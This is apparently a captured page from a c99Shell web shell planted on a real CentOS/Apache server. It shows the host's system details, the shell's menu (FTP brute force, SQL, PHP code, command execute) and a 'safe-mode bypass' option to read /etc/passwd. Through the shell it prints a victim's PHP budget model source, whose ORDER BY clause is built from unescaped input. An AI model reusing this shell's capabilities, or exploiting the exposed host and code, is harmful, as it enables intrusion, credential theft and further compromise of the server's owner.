110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis/application/models/esa/ drwxr-xr-x Free 50.65 GB of 127.8 GB (39.63%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mis/application/models/esa/ drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php



include_once("da_sa_planbudget.php");



class Sa_planbudget_model extends Da_sa_planbudget {



    /*

     * aOrderBy = array('fieldname' => 'ASC|DESC', ... )

     */

    function get_all($aOrderBy=""){

        $orderBy = "";

        if ( is_array($aOrderBy) ) {

            $orderBy.= "ORDER BY "; 

            foreach ($aOrderBy as $key => $value) {

                $orderBy.= "$key $value, ";

            }

            $orderBy = substr($orderBy, 0, strlen($orderBy)-2);

        }

        $sql = "SELECT * 

                FROM sa_planbudget 

                $orderBy";

        $query = $this->db->query($sql);

        return $query;

    }

    

    /*

     * create array of pk field and value for generate select list in view, must edit PK_FIELD and FIELD_NAME manually

     * the first line of select list is '-----เลือก-----' by default.

     * if you do not need the first list of select list is '-----เลือก-----', please pass $optional parameter to other values. 

     * you can delete this function if it not necessary.

     */

    function get_options($optional='y') {

        $qry = $this->get_all();

        if ($optional=='y') $opt[''] = '-----เลือก-----';

        foreach ($qry->result() as $row) {

            $opt[$row->pb_id] = $row->pb_cost;

        }

        return $opt;

    }

    

    // add your functions here



    function qu_joinsb(){

 /*       $sql = "SELECT *

            FROM (



            SELECT p.sb_id AS p_sb_id, p.sb_name AS p_sb_name, p.sb_pid AS p_sb_pid, c . *

            FROM (



            SELECT *

            FROM sa_sourcebudget

            WHERE sb_pid =0

            )p

            LEFT JOIN (



            SELECT *

            FROM sa_sourcebudget

            WHERE sb_pid !=0

            )c ON p.sb_id = c.sb_pid

            ORDER BY p_sb_id, sb_id

            )sb

            LEFT JOIN (



            SELECT *

            FROM sa_planbudget

            WHERE pb_pl_id =?

            )pb ON sb.p_sb_id = pb.pb_sb_id || sb.sb_id = pb.pb_sb_id";

*/

        $sql = "SELECT *

            FROM (



                SELECT p.sb_id AS p_sb_id, p.sb_name AS p_sb_name, p.sb_pid AS p_sb_pid, p.pb_cost as p_cost, c . *

                FROM (



                    SELECT *

                   FROM sa_sourcebudget

            LEFT JOIN (



                        SELECT *

                        FROM sa_planbudget

                        WHERE pb_pl_id =?

                    )pb ON sb_id = pb.pb_sb_id



                    WHERE sb_pid =0

                )p

               LEFT JOIN (



                    SELECT *

                    FROM sa_sourcebudget

            LEFT JOIN (



                        SELECT *

                        FROM sa_planbudget

                        WHERE pb_pl_id =?

                    )pb ON sb_id = pb.pb_sb_id



                    WHERE sb_pid !=0

                )c ON p.sb_id = c.sb_pid

                ORDER BY p_sb_id, sb_id

            )sb

        ";

        $query = $this->db->query($sql,array($this->pb_pl_id,$this->pb_pl_id));

        return $query;

    }





    function delete_pb($mpj) { 

        $sql = "DELETE

                FROM $this->sa_dbname.sa_planbudget

                WHERE pb_pl_id = ? ";

        $query = $this->db->query($sql,array($mpj));

        return $query;

    }



} // end class Sa_planbudget_model

?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: